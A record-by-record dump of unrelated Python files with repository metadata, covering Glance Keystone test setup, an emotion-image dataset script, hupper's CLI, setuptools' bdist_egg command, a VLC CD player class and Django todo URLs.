= server.conf_base.split('\n') # Need to find the pipeline for idx, text in enumerate(conf_base): if text.startswith('[pipeline:glance-'): # OK, the line to modify is the next one... modidx = idx + 1 break # Now we need to replace the default context field... conf_base[modidx] = conf_base[modidx].replace('context', 'tokenauth keystone_shim') # Put the conf back together and append the keystone pieces server.conf_base = '\n'.join(conf_base) + """ [filter:tokenauth] paste.filter_factory = keystone.middleware.auth_token:filter_factory service_protocol = http service_host = 127.0.0.1 service_port = %%(bind_port)s auth_host = 127.0.0.1 auth_port = %(admin_port)s auth_protocol = http auth_uri = http://127.0.0.1:%(admin_port)s/ admin_token = 999888777666 delay_auth_decision = 1 [filter:keystone_shim] paste.filter_factory = keystone.middleware.glance_auth_token:filter_factory """ % subs class KeystoneTests(functional.FunctionalTest): """ Base test class for keystone-related tests. """ inited = False KEYSTONE = None def setUp(self): """ Look up keystone-control. """ if not self.inited: KeystoneTests.inited = True # Make sure we can import keystone tmp_path = sys.path if 'GLANCE_TEST_KEYSTONE_PATH' in os.environ: sys.path.insert(1, os.environ['GLANCE_TEST_KEYSTONE_PATH']) try: import keystone except ImportError, e: # Can't import keystone KeystoneTests.inited = True KeystoneTests.disabled = True KeystoneTests.disabled_message = ( "Cannot import keystone. Set " "GLANCE_TEST_KEYSTONE_PATH to the directory containing " "the keystone package.") finally: sys.path = tmp_path # Try looking up the keystone executable if self.KEYSTONE is None: bindir = os.environ.get('GLANCE_TEST_KEYSTONE_BIN') if bindir is not None: cmdname = os.path.join(bindir, 'keystone-control') else: cmdname = 'keystone-control' KeystoneTests.KEYSTONE = find_executable(cmdname) # If we don't have keystone-control, disable ourself if self.disabled is not True and self.KEYSTONE is None: KeystoneTests.disabled = True KeystoneTests.disabled_message = ( "Cannot find keystone-control. Set " "GLANCE_TEST_KEYSTONE_BIN to the directory containing " "the keystone binaries.") # Make sure to call superclass super(KeystoneTests, self).setUp() # Also need keystone auth and admin ports... self.auth_port = functional.get_unused_port() self.admin_port = functional.get_unused_port() # Set up the servers self.auth_server = AuthServer(self.KEYSTONE, self.test_dir, self.auth_port, self.admin_port) self.admin_server = AdminServer(self.KEYSTONE, self.test_dir, self.auth_port, self.admin_port) # Include their pid files, too self.pid_files.extend([self.auth_server.pid_file, self.admin_server.pid_file]) # Have to patch the api and registry config files for keystone # integration conf_patch(self.api_server, auth_port=self.auth_port, admin_port=self.admin_port) conf_patch(self.registry_server, auth_port=self.auth_port, admin_port=self.admin_port) self.registry_server.conf_base += ( 'context_class = glance.registry.context.RequestContext\n') # Need to add keystone python path to the environment for # glance self.exec_env = None if 'GLANCE_TEST_KEYSTONE_PATH' in os.environ: def augment_python_path(currpath): if not currpath: return os.environ['GLANCE_TEST_KEYSTONE_PATH'] return (os.environ['GLANCE_TEST_KEYSTONE_PATH'] + ':' + currpath) self.exec_env = dict(PYTHONPATH=augment_python_path) self.api_server.exec_env = self.exec_env self.registry_server.exec_env = self.exec_env # Keystone can take care of itself on this score def tearDown(self): super(KeystoneTests, self).tearDown() if not self.disabled: self._reset_database(self.auth_server.sql_connection) def start_servers(self, **kwargs): """ Starts the authentication and admin servers (keystone-auth and keystone-admin) on unused ports, in addition to the Glance API and Registry servers. Any kwargs passed to this method will override the configuration value in the conf file used in starting the servers. """ # Start with the Glance servers super(KeystoneTests, self).start_servers(**kwargs) # Set up the data store keystone_conf = self.auth_server.write_conf(**kwargs) if not os.path.isdir(self.test_dir): os.mkdir(self.test_dir) datafile = os.path.join(os.path.dirname(__file__), 'data', 'keystone_data.py') execute("python %s -c %s" % (datafile, keystone_conf), no_venv=True, exec_env=self.exec_env) # Start keystone-auth exitcode, out, err = self.auth_server.start(**kwargs) self.assertEqual(0, exitcode, "Failed to spin up the Auth server. " "Got: %s" % err) self.assertTrue("Starting keystone-auth with" in out) # Now keystone-admin exitcode, out, err = self.admin_server.start(**kwargs) self.assertEqual(0, exitcode, "Failed to spin up the Admin server. " "Got: %s" % err) self.assertTrue("Starting keystone-admin with" in out) self.wait_for_keystone_servers() def wait_for_keystone_servers(self, timeout=3): """ Tight loop, waiting for both Auth and Admin server to be available on the ports. Returns when both are pingable. There is a timeout on waiting for the servers to come up. :param timeout: Optional, defaults to 3 seconds """ now = datetime.datetime.now() timeout_time = now + datetime.timedelta(seconds=timeout) while (timeout_time > now): if (self.ping_server(self.auth_port) and self.ping_server(self.admin_port)): return now = datetime.datetime.now() time.sleep(0.05) self.assertFalse(True, "Failed to start keystone servers.") def stop_servers(self): """ Called to stop the started servers in a normal fashion. Note that cleanup() will stop the servers using a fairly draconian method of sending a SIGTERM signal to the servers. Here, we use the glance-control and keystone-control stop method to gracefully shut the servers down. This method also asserts that the shutdown was clean, and so it is meant to be called during a normal test case sequence. """ # Spin down the auth server... exitcode, out, err = self.auth_server.stop() self.assertEqual(0, exitcode, "Failed to spin down the Auth server. " "Got: %s" % err) # ...and the admin server... exitcode, out, err = self.admin_server.stop() self.assertEqual(0, exitcode, "Failed to spin down the Admin server. " "Got: %s" % err) # Now on to everything else... super(KeystoneTests, self).stop_servers()
f4c60a6b9683e8bff777b2c1770eff89ad84842e
6e8f2e28479566dbaa338300b2d61f784ff83f97
/.history/code/datasetup_20210414095452.py
f5a12d33d825aade94f6256ddefae15b5c5a1929
[]
no_license
eeng5/CV-final-project
55a7d736f75602858233ebc380c4e1d67ab2b866
580e28819560b86f6974959efb1d31ef138198fc
refs/heads/main
2023-04-09T21:28:21.531293
2021-04-21T19:57:22
2021-04-21T19:57:22
352,703,734
0
0
null
null
null
null
UTF-8
Python
false
false
3,652
py
from PIL import Image import numpy as np import matplotlib.pyplot as plt import matplotlib.image as mpimg import pandas as pd import cv2 import os import glob from pathlib import Path def cleanTestDirs(): for f in Path('/Users/Natalie/Desktop/cs1430/CV-final-project/data/test').glob('*.jpg'): try: f.unlink() except OSError as e: print("Error: %s : %s" % (f, e.strerror)) def cleanTrainDirs(): for f in Path('/Users/Natalie/Desktop/cs1430/CV-final-project/data/train').glob('*.jpg'): try: f.unlink() except OSError as e: print("Error: %s : %s" % (f, e.strerror)) def cleanAll(): cleanTestDirs() cleanTrainDirs() def createPixelArray(arr): arr = list(map(int, arr.split())) array = np.array(arr, dtype=np.uint8) array = array.reshape((48, 48)) return array def equalize_hist(img): img = cv2.equalizeHist(img) return img def showImages(imgs): _, axs = plt.subplots(1, len(imgs), figsize=(20, 20)) axs = axs.flatten() for img, ax in zip(imgs, axs): ax.imshow(img,cmap=plt.get_cmap('gray')) plt.show() def augmentIMG(img, task): imgs = [img] img1 = equalize_hist(img) imgs.append(img1) if(task == 3): img2 = cv2.bilateralFilter(img1, d=9, sigmaColor=75, sigmaSpace=75) imgs.append(img2) img6 = cv2.flip(img, 1) # flip horizontally imgs.append(img6) return imgs def saveIMG(arr, num, folderLoc): im = Image.fromarray(arr) filename = folderLoc + "image_"+ num+".jpg" im.save(filename) def createTrain(emotion_dict, task): df = pd.read_csv('/Users/elizabethwang/Desktop/CS1430/CV-final-project/data/train.csv') # CHANGE ME base_filename = /Users/Natalie/Desktop/cs1430/CV-final-project/data/train' # CHANGE ME for index, row in df.iterrows(): if (row[' Usage'] == "Training"): px = row[' pixels'] emot = int(row['emotion']) emot_loc = emotion_dict[emot] filename = base_filename + emot_loc img = createPixelArray(px) img_arr = augmentIMG(img, task) idx = 0 for i in img_arr: num = str(index) + "_" + str(idx) idx +=1 saveIMG(i, num, filename) def createTest(emotion_dict , task): df = pd.read_csv('/Users/elizabethwang/Desktop/CS1430/CV-final-project/data/icml_face_data.csv') # CHANGE ME base_filename = "/Users/elizabethwang/Desktop/CS1430/CV-final-project/data/test/" # CHANGE ME for index, row in df.iterrows(): if (row[' Usage'] == "PublicTest"): px = row[' pixels'] emot = int(row['emotion']) emot_loc = emotion_dict[emot] filename = base_filename + emot_loc img = createPixelArray(px) img_arr = augmentIMG(img, task) idx = 0 for i in img_arr: num = str(index) + "_" + str(idx) idx +=1 saveIMG(i, num, filename) def createEmotionDict(): emotionDict = {} emotionDict[0]="angry/" emotionDict[1]="disgust/" emotionDict[2]="fear/" emotionDict[3]="happy/" emotionDict[4]="sad/" emotionDict[5]="surprise/" emotionDict[6] = "neutral/" return emotionDict def createSimpleData(): cleanAll() emot_dict = createEmotionDict() createTrain(emot_dict, 1) createTest(emot_dict, 1) def createComplexData(): cleanAll() emot_dict = createEmotionDict() createTrain(emot_dict, 3) createTest(emot_dict, 3) def main(): emot_dict = createEmotionDict() if __name__ == '__main__': main()
89e45a5cc761cc4a4a3c992bcb906b1d81f2e26d
e0b5a869c687fea3c9dda138734d25b3c5e68b88
/venv/Lib/site-packages/hupper/cli.py
b6c0f6a609fb989443332a91ab55d53443a9b502
[]
no_license
asen-krasimirov/Python-OOP-Course
b74de5f83fb3e287cb206d48c3db79d15657c902
c6df3830168d8b8d780d4fb4ccfe67d1bb350f7e
refs/heads/main
2023-02-01T04:09:33.796334
2020-12-15T14:56:59
2020-12-15T14:56:59
309,389,119
2
0
null
null
null
null
UTF-8
Python
false
false
1,853
py
import argparse import runpy import sys from .logger import LogLevel from .reloader import start_reloader def interval_parser(string): """Parses the shutdown or reload interval into an int greater than 0.""" msg = "Interval must be an int greater than 0" try: value = int(string) if value <= 0: raise argparse.ArgumentTypeError(msg) return value except ValueError: raise argparse.ArgumentTypeError(msg) def main(): parser = argparse.ArgumentParser() parser.add_argument("-m", dest="module", required=True) parser.add_argument("-w", dest="watch", action="append") parser.add_argument("-x", dest="ignore", action="append") parser.add_argument("-v", dest="verbose", action='store_true') parser.add_argument("-q", dest="quiet", action='store_true') parser.add_argument("--shutdown-interval", type=interval_parser) parser.add_argument("--reload-interval", type=interval_parser) args, unknown_args = parser.parse_known_args() if args.quiet: level = LogLevel.ERROR elif args.verbose: level = LogLevel.DEBUG else: level = LogLevel.INFO # start_reloader has defaults for some values so we avoid passing # arguments if we don't have to reloader_kw = {} if args.reload_interval is not None: reloader_kw['reload_interval'] = args.reload_interval if args.shutdown_interval is not None: reloader_kw['shutdown_interval'] = args.shutdown_interval reloader = start_reloader( "hupper.cli.main", verbose=level, ignore_files=args.ignore, **reloader_kw ) sys.argv[1:] = unknown_args sys.path.insert(0, "") if args.watch: reloader.watch_files(args.watch) return runpy.run_module(args.module, alter_sys=True, run_name="__main__")
03db626ae713ce0b0c3f4ee45b458daf28cdd3b7
f764ceff10c7f4a636d8bb7002075cb1b543426b
/py/tests/day05_test.py
c3ef7c38e54ffb9edcc66f09f1d8ef8197e82686
[]
no_license
gunnihinn/advent-2018
73eec4457c0b4abc4b0f871a42e0e58770ac457f
d4e2e05e2c6af11c28a07ec9d9178bc9f353c67b
refs/heads/master
2020-04-09T07:27:48.009540
2018-12-12T14:00:50
2018-12-12T14:00:50
160,156,692
0
0
null
null
null
null
UTF-8
Python
false
false
499
py
import unittest from py.day05 import * class TestExample(unittest.TestCase): def test_reduce1(self): self.assertEqual(reduce('aA'), []) def test_reduce2(self): self.assertEqual(reduce('abBA'), []) def test_reduce3(self): self.assertEqual(reduce('abAB'), list('abAB')) def test_reduce4(self): self.assertEqual(reduce('aabAAB'), list('aabAAB')) def test_reduce5(self): self.assertEqual(reduce('dabAcCaCBAcCcaDA'), list('dabCBAcaDA'))
3ae3c619c3f36bab8818e6ecf5b6d3e41d1ddced
6e5c625136c36d845c72f7a4fdea482f05384590
/venv/lib/python3.9/site-packages/setuptools/command/bdist_egg.py
87a325c16db5f0dc5ea237611fd9406af7ea49b9
[]
no_license
DvdCp/BattleWebApp
26fe9e714c090add337d951a1672ef7747a1db33
f8eeeccdb0e73bd4bcc9529adfe74436d8cf5c13
refs/heads/master
2023-07-08T09:53:10.640382
2021-08-08T18:09:13
2021-08-08T18:09:13
379,716,474
0
0
null
null
null
null
UTF-8
Python
false
false
18,183
py
"""setuptools.command.bdist_egg Build .egg distributions""" from distutils.errors import DistutilsSetupError from distutils.dir_util import remove_tree, mkpath from distutils import log from types import CodeType import sys import os import re import textwrap import marshal from setuptools.extern import six from pkg_resources import get_build_platform, Distribution, ensure_directory from pkg_resources import EntryPoint from setuptools.extension import Library from setuptools import Command try: # Python 2.7 or >=3.2 from sysconfig import get_path, get_python_version def _get_purelib(): return get_path("purelib") except ImportError: from distutils.sysconfig import get_python_lib, get_python_version def _get_purelib(): return get_python_lib(False) def strip_module(filename): if '.' in filename: filename = os.path.splitext(filename)[0] if filename.endswith('module'): filename = filename[:-6] return filename def sorted_walk(dir): """Do os.walk in a reproducible way, independent of indeterministic filesystem readdir order """ for base, dirs, files in os.walk(dir): dirs.sort() files.sort() yield base, dirs, files def write_stub(resource, pyfile): _stub_template = textwrap.dedent(""" def __bootstrap__(): global __bootstrap__, __loader__, __file__ import sys, pkg_resources, imp __file__ = pkg_resources.resource_filename(__name__, %r) __loader__ = None; del __bootstrap__, __loader__ imp.load_dynamic(__name__,__file__) __bootstrap__() """).lstrip() with open(pyfile, 'w') as f: f.write(_stub_template % resource) class bdist_egg(Command): description = "create an \"egg\" distribution" user_options = [ ('bdist-dir=', 'b', "temporary directory for creating the distribution"), ('plat-name=', 'p', "platform name to embed in generated filenames " "(default: %s)" % get_build_platform()), ('exclude-source-files', None, "remove all .py files from the generated egg"), ('keep-temp', 'k', "keep the pseudo-installation tree around after " + "creating the distribution archive"), ('dist-dir=', 'd', "directory to put final built distributions in"), ('skip-build', None, "skip rebuilding everything (for testing/debugging)"), ] boolean_options = [ 'keep-temp', 'skip-build', 'exclude-source-files' ] def initialize_options(self): self.bdist_dir = None self.plat_name = None self.keep_temp = 0 self.dist_dir = None self.skip_build = 0 self.egg_output = None self.exclude_source_files = None def finalize_options(self): ei_cmd = self.ei_cmd = self.get_finalized_command("egg_info") self.egg_info = ei_cmd.egg_info if self.bdist_dir is None: bdist_base = self.get_finalized_command('bdist').bdist_base self.bdist_dir = os.path.join(bdist_base, 'egg') if self.plat_name is None: self.plat_name = get_build_platform() self.set_undefined_options('bdist', ('dist_dir', 'dist_dir')) if self.egg_output is None: # Compute filename of the output egg basename = Distribution( None, None, ei_cmd.egg_name, ei_cmd.egg_version, get_python_version(), self.distribution.has_ext_modules() and self.plat_name ).egg_name() self.egg_output = os.path.join(self.dist_dir, basename + '.egg') def do_install_data(self): # Hack for packages that install data to install's --install-lib self.get_finalized_command('install').install_lib = self.bdist_dir site_packages = os.path.normcase(os.path.realpath(_get_purelib())) old, self.distribution.data_files = self.distribution.data_files, [] for item in old: if isinstance(item, tuple) and len(item) == 2: if os.path.isabs(item[0]): realpath = os.path.realpath(item[0]) normalized = os.path.normcase(realpath) if normalized == site_packages or normalized.startswith( site_packages + os.sep ): item = realpath[len(site_packages) + 1:], item[1] # XXX else: raise ??? self.distribution.data_files.append(item) try: log.info("installing package data to %s", self.bdist_dir) self.call_command('install_data', force=0, root=None) finally: self.distribution.data_files = old def get_outputs(self): return [self.egg_output] def call_command(self, cmdname, **kw): """Invoke reinitialized command `cmdname` with keyword args""" for dirname in INSTALL_DIRECTORY_ATTRS: kw.setdefault(dirname, self.bdist_dir) kw.setdefault('skip_build', self.skip_build) kw.setdefault('dry_run', self.dry_run) cmd = self.reinitialize_command(cmdname, **kw) self.run_command(cmdname) return cmd def run(self): # Generate metadata first self.run_command("egg_info") # We run install_lib before install_data, because some data hacks # pull their data path from the install_lib command. log.info("installing library code to %s", self.bdist_dir) instcmd = self.get_finalized_command('install') old_root = instcmd.root instcmd.root = None if self.distribution.has_c_libraries() and not self.skip_build: self.run_command('build_clib') cmd = self.call_command('install_lib', warn_dir=0) instcmd.root = old_root all_outputs, ext_outputs = self.get_ext_outputs() self.stubs = [] to_compile = [] for (p, ext_name) in enumerate(ext_outputs): filename, ext = os.path.splitext(ext_name) pyfile = os.path.join(self.bdist_dir, strip_module(filename) + '.py') self.stubs.append(pyfile) log.info("creating stub loader for %s", ext_name) if not self.dry_run: write_stub(os.path.basename(ext_name), pyfile) to_compile.append(pyfile) ext_outputs[p] = ext_name.replace(os.sep, '/') if to_compile: cmd.byte_compile(to_compile) if self.distribution.data_files: self.do_install_data() # Make the EGG-INFO directory archive_root = self.bdist_dir egg_info = os.path.join(archive_root, 'EGG-INFO') self.mkpath(egg_info) if self.distribution.scripts: script_dir = os.path.join(egg_info, 'scripts') log.info("installing scripts to %s", script_dir) self.call_command('install_scripts', install_dir=script_dir, no_ep=1) self.copy_metadata_to(egg_info) native_libs = os.path.join(egg_info, "native_libs.txt") if all_outputs: log.info("writing %s", native_libs) if not self.dry_run: ensure_directory(native_libs) libs_file = open(native_libs, 'wt') libs_file.write('\n'.join(all_outputs)) libs_file.write('\n') libs_file.close() elif os.path.isfile(native_libs): log.info("removing %s", native_libs) if not self.dry_run: os.unlink(native_libs) write_safety_flag( os.path.join(archive_root, 'EGG-INFO'), self.zip_safe() ) if os.path.exists(os.path.join(self.egg_info, 'depends.txt')): log.warn( "WARNING: 'depends.txt' will not be used by setuptools 0.6!\n" "Use the install_requires/extras_require setup() args instead." ) if self.exclude_source_files: self.zap_pyfiles() # Make the archive make_zipfile(self.egg_output, archive_root, verbose=self.verbose, dry_run=self.dry_run, mode=self.gen_header()) if not self.keep_temp: remove_tree(self.bdist_dir, dry_run=self.dry_run) # Add to 'Distribution.dist_files' so that the "upload" command works getattr(self.distribution, 'dist_files', []).append( ('bdist_egg', get_python_version(), self.egg_output)) def zap_pyfiles(self): log.info("Removing .py files from temporary directory") for base, dirs, files in walk_egg(self.bdist_dir): for name in files: path = os.path.join(base, name) if name.endswith('.py'): log.debug("Deleting %s", path) os.unlink(path) if base.endswith('__pycache__'): path_old = path pattern = r'(?P<name>.+)\.(?P<magic>[^.]+)\.pyc' m = re.match(pattern, name) path_new = os.path.join( base, os.pardir, m.group('name') + '.pyc') log.info( "Renaming file from [%s] to [%s]" % (path_old, path_new)) try: os.remove(path_new) except OSError: pass os.rename(path_old, path_new) def zip_safe(self): safe = getattr(self.distribution, 'zip_safe', None) if safe is not None: return safe log.warn("zip_safe flag not set; analyzing archive contents...") return analyze_egg(self.bdist_dir, self.stubs) def gen_header(self): epm = EntryPoint.parse_map(self.distribution.entry_points or '') ep = epm.get('setuptools.installation', {}).get('eggsecutable') if ep is None: return 'w' # not an eggsecutable, do it the usual way. if not ep.attrs or ep.extras: raise DistutilsSetupError( "eggsecutable app point (%r) cannot have 'extras' " "or refer to a module" % (ep,) ) pyver = '{}.{}'.format(*sys.version_info) pkg = ep.module_name full = '.'.join(ep.attrs) base = ep.attrs[0] basename = os.path.basename(self.egg_output) header = ( "#!/bin/sh\n" 'if [ `basename $0` = "%(basename)s" ]\n' 'then exec python%(pyver)s -c "' "import sys, os; sys.path.insert(0, os.path.abspath('$0')); " "from %(pkg)s import %(base)s; sys.exit(%(full)s())" '" "$@"\n' 'else\n' ' echo $0 is not the correct name for this egg file.\n' ' echo Please rename it back to %(basename)s and try again.\n' ' exec false\n' 'fi\n' ) % locals() if not self.dry_run: mkpath(os.path.dirname(self.egg_output), dry_run=self.dry_run) f = open(self.egg_output, 'w') f.write(header) f.close() return 'a' def copy_metadata_to(self, target_dir): "Copy metadata (egg info) to the target_dir" # normalize the path (so that a forward-slash in egg_info will # match using startswith below) norm_egg_info = os.path.normpath(self.egg_info) prefix = os.path.join(norm_egg_info, '') for path in self.ei_cmd.filelist.files: if path.startswith(prefix): target = os.path.join(target_dir, path[len(prefix):]) ensure_directory(target) self.copy_file(path, target) def get_ext_outputs(self): """Get a list of relative paths to C extensions in the output distro""" all_outputs = [] ext_outputs = [] paths = {self.bdist_dir: ''} for base, dirs, files in sorted_walk(self.bdist_dir): for filename in files: if os.path.splitext(filename)[1].lower() in NATIVE_EXTENSIONS: all_outputs.append(paths[base] + filename) for filename in dirs: paths[os.path.join(base, filename)] = (paths[base] + filename + '/') if self.distribution.has_ext_modules(): build_cmd = self.get_finalized_command('build_ext') for ext in build_cmd.extensions: if isinstance(ext, Library): continue fullname = build_cmd.get_ext_fullname(ext.name) filename = build_cmd.get_ext_filename(fullname) if not os.path.basename(filename).startswith('dl-'): if os.path.exists(os.path.join(self.bdist_dir, filename)): ext_outputs.append(filename) return all_outputs, ext_outputs NATIVE_EXTENSIONS = dict.fromkeys('.dll .so .dylib .pyd'.split()) def walk_egg(egg_dir): """Walk an unpacked egg's contents, skipping the metadata directory""" walker = sorted_walk(egg_dir) base, dirs, files = next(walker) if 'EGG-INFO' in dirs: dirs.remove('EGG-INFO') yield base, dirs, files for bdf in walker: yield bdf def analyze_egg(egg_dir, stubs): # check for existing flag in EGG-INFO for flag, fn in safety_flags.items(): if os.path.exists(os.path.join(egg_dir, 'EGG-INFO', fn)): return flag if not can_scan(): return False safe = True for base, dirs, files in walk_egg(egg_dir): for name in files: if name.endswith('.py') or name.endswith('.pyw'): continue elif name.endswith('.pyc') or name.endswith('.pyo'): # always scan, even if we already know we're not safe safe = scan_module(egg_dir, base, name, stubs) and safe return safe def write_safety_flag(egg_dir, safe): # Write or remove zip safety flag file(s) for flag, fn in safety_flags.items(): fn = os.path.join(egg_dir, fn) if os.path.exists(fn): if safe is None or bool(safe) != flag: os.unlink(fn) elif safe is not None and bool(safe) == flag: f = open(fn, 'wt') f.write('\n') f.close() safety_flags = { True: 'zip-safe', False: 'not-zip-safe', } def scan_module(egg_dir, base, name, stubs): """Check whether module possibly uses unsafe-for-zipfile stuff""" filename = os.path.join(base, name) if filename[:-1] in stubs: return True # Extension module pkg = base[len(egg_dir) + 1:].replace(os.sep, '.') module = pkg + (pkg and '.' or '') + os.path.splitext(name)[0] if six.PY2: skip = 8 # skip magic & date elif sys.version_info < (3, 7): skip = 12 # skip magic & date & file size else: skip = 16 # skip magic & reserved? & date & file size f = open(filename, 'rb') f.read(skip) code = marshal.load(f) f.close() safe = True symbols = dict.fromkeys(iter_symbols(code)) for bad in ['__file__', '__path__']: if bad in symbols: log.warn("%s: module references %s", module, bad) safe = False if 'inspect' in symbols: for bad in [ 'getsource', 'getabsfile', 'getsourcefile', 'getfile' 'getsourcelines', 'findsource', 'getcomments', 'getframeinfo', 'getinnerframes', 'getouterframes', 'stack', 'trace' ]: if bad in symbols: log.warn("%s: module MAY be using inspect.%s", module, bad) safe = False return safe def iter_symbols(code): """Yield names and strings used by `code` and its nested code objects""" for name in code.co_names: yield name for const in code.co_consts: if isinstance(const, six.string_types): yield const elif isinstance(const, CodeType): for name in iter_symbols(const): yield name def can_scan(): if not sys.platform.startswith('java') and sys.platform != 'cli': # CPython, PyPy, etc. return True log.warn("Unable to analyze compiled code on this platform.") log.warn("Please ask the author to include a 'zip_safe'" " setting (either True or False) in the package's setup.py") # Attribute names of options for commands that might need to be convinced to # install to the egg build directory INSTALL_DIRECTORY_ATTRS = [ 'install_lib', 'install_dir', 'install_data', 'install_base' ] def make_zipfile(zip_filename, base_dir, verbose=0, dry_run=0, compress=True, mode='w'): """Create a zip file from all the files under 'base_dir'. The output zip file will be named 'base_dir' + ".zip". Uses either the "zipfile" Python module (if available) or the InfoZIP "zip" utility (if installed and found on the default search path). If neither tool is available, raises DistutilsExecError. Returns the name of the output zip file. """ import zipfile mkpath(os.path.dirname(zip_filename), dry_run=dry_run) log.info("creating '%s' and adding '%s' to it", zip_filename, base_dir) def visit(z, dirname, names): for name in names: path = os.path.normpath(os.path.join(dirname, name)) if os.path.isfile(path): p = path[len(base_dir) + 1:] if not dry_run: z.write(path, p) log.debug("adding '%s'", p) compression = zipfile.ZIP_DEFLATED if compress else zipfile.ZIP_STORED if not dry_run: z = zipfile.ZipFile(zip_filename, mode, compression=compression) for dirname, dirs, files in sorted_walk(base_dir): visit(z, dirname, files) z.close() else: for dirname, dirs, files in sorted_walk(base_dir): visit(None, dirname, files) return zip_filename
77e75cde2e9917f1df2476fea3c616112c507065
d3919225e9a0af652eddd333cb5540ca065d6512
/scirex/predictors/__init__.py
5d33845887b44b1580dc4a24ed467e098d594d7d
[ "Apache-2.0" ]
permissive
viswavi/SciREX
ed230bf16f142950b60fbe4cd0bd4a49be65bb16
8e4b402e95d438c92eeecee315d389903a963b8d
refs/heads/master
2023-05-19T08:38:16.709227
2021-05-24T15:50:30
2021-05-24T15:56:30
294,549,661
0
1
Apache-2.0
2021-06-09T16:30:06
2020-09-11T00:02:13
Python
UTF-8
Python
false
false
97
py
# Because Allennlp decoding api won't work. # Need to combine paragraph stuff into document stuff
ffaa0033881a2acb5b23949e5974638c8cc10895
64bc2537c5a05dd1c53eaf0684383c8f841f2cf3
/src/player/MediaPlayer.py
62fde0cb7743dd8c8b7708d28bd1c62cc916af99
[]
no_license
fvcastellanos/pi-player
a8865221988f6658b77b8059458096a2b737a6d7
99edd22644d09974e62eb4161b20cea3aaa4401b
refs/heads/main
2023-08-29T12:10:32.096032
2021-10-24T05:44:39
2021-10-24T05:44:39
417,582,149
0
0
null
null
null
null
UTF-8
Python
false
false
3,046
py
import vlc import logging import discid from player.AudioDisc import AudioDisc from player.Track import Track logger = logging.getLogger(__name__) class MediaPlayer: __mediaPath: str __player : vlc.MediaPlayer __mediaList : vlc.MediaList __mediaListPlayer : vlc.MediaListPlayer __eventManager: vlc.EventManager __media: vlc.Media audioDisc: AudioDisc def __init__(self, path = "cdda:///dev/sr0"): self.__mediaPath = path self.audioDisc = None self.__createMediaPlayer() def play(self): logger.info("Play track") self.__mediaListPlayer.play() def stop(self): logger.info("Stop track") if self.__mediaListPlayer.is_playing(): self.__mediaListPlayer.stop() def pause(self): logger.info("Pause track") self.__mediaListPlayer.pause() def next(self): logger.info("Next track") self.__mediaListPlayer.next() def prev(self): logger.info("Previous track") self.__mediaListPlayer.previous() def loadDisk(self): logger.info("Load disc") self.__loadDisk(self.__mediaPath) # ---------------------------------------------------------------------- def __loadDisk(self, path: str): logger.info(f"Load media player resource: {path}") self.__getDiscInformation(path) if (self.audioDisc != None): for track in self.audioDisc.tracks: self.__media = vlc.Media(path, (track.playerName)) self.__mediaList.add_media(self.__media) self.__mediaListPlayer.set_media_list(self.__mediaList) self.__eventManager = self.__player.event_manager() # self.__eventManager__.event_attach(vlc.EventType.MediaParsedChanged, self.__getDiscInformation__) # self.__eventManager.event_attach(vlc.EventType.MediaPlayerTimeChanged, self.__mediaPlayerTimeChanged) def __mediaPlayerTimeChanged(self, event): logger.info(f"time changed: {event}") def __getDiscInformation(self, path: str): try: discDevice = path[7:] disc : discid.Disc = discid.read(device = discDevice) logger.info(f"disc id: {disc.id}") tracks = [Track(name = track.number, duration = track.seconds) for track in disc.tracks] self.audioDisc = AudioDisc(id = disc.id, tracks = tracks) except Exception as exception: logger.exception("Unable to load disc information", exception) def __createMediaPlayer(self): vlcInstance = vlc.Instance() self.__player = vlcInstance.media_player_new() self.__mediaList = vlcInstance.media_list_new() self.__mediaListPlayer = vlcInstance.media_list_player_new() self.__mediaListPlayer.set_media_player(self.__player)
4cb2ac17b39afa644185ebcf5031f1894d4ba203
c64713cee6f47b5ac3448ff5ecb358d9f4bd5542
/todo_list/todo_list/urls.py
b18144eab99eb3d5218d3d86ecef2e95a6f2d8ea
[ "MIT" ]
permissive
ptyadana/django3-todo-app
ce902681d07e1f0ce47be6def70196a9e25168ef
0cc753e25f2ace219e51539ee511e5ed844a1d7c
refs/heads/master
2021-03-25T23:23:04.626284
2020-03-16T12:52:12
2020-03-16T12:52:12
247,654,283
1
0
null
null
null
null
UTF-8
Python
false
false
1,535
py
"""todo_list URL Configuration The `urlpatterns` list routes URLs to views. For more information please see: https://docs.djangoproject.com/en/3.0/topics/http/urls/ Examples: Function views 1. Add an import: from my_app import views 2. Add a URL to urlpatterns: path('', views.home, name='home') Class-based views 1. Add an import: from other_app.views import Home 2. Add a URL to urlpatterns: path('', Home.as_view(), name='home') Including another URLconf 1. Import the include() function: from django.urls import include, path 2. Add a URL to urlpatterns: path('blog/', include('blog.urls')) """ from django.contrib import admin from django.urls import path from todo_app import views # from django.conf.urls import handler404 # handler404 = views.handler404 urlpatterns = [ path('admin/', admin.site.urls), #Auth path('signup/',views.signupuser, name="signupuser"), path('login/',views.loginuser, name="loginuser"), path('logout/',views.logoutuser, name="logoutuser"), #To Do path('',views.home, name='home'), path('home/',views.home, name='home'), path('current/',views.currenttodos, name='currenttodos'), path('completed/',views.completedtodos, name='completedtodos'), path('create/',views.createtodos, name='createtodos'), path('todo/<int:todo_pk>',views.viewtodo, name='viewtodo'), path('todo/<int:todo_pk>/complete',views.completetodo, name='completetodo'), path('todo/<int:todo_pk>/delete',views.deletetodo, name='deletetodo'), ]
193c66f9c3f80d05c19b0f91adaa16272a94ff58
8ffaaedd45732f077a3b20dcfd1e6a11c8cd779b
/deck_chores/parsers.py
236d855ccb0ee5589e938b8724f8ba9455fdd29f
[ "ISC" ]
permissive
mumblepins-docker/deck-chores
84dc72684767dad5d31fbf9e481b9e248da44ca2
36ee7501837154581c19d1ad1cead401539eb568
refs/heads/master
2020-04-05T18:53:29.369373
2018-10-25T19:04:58
2018-10-25T19:04:58
null
0
0
null
null
null
null
UTF-8
Python
false
false
7,708
py
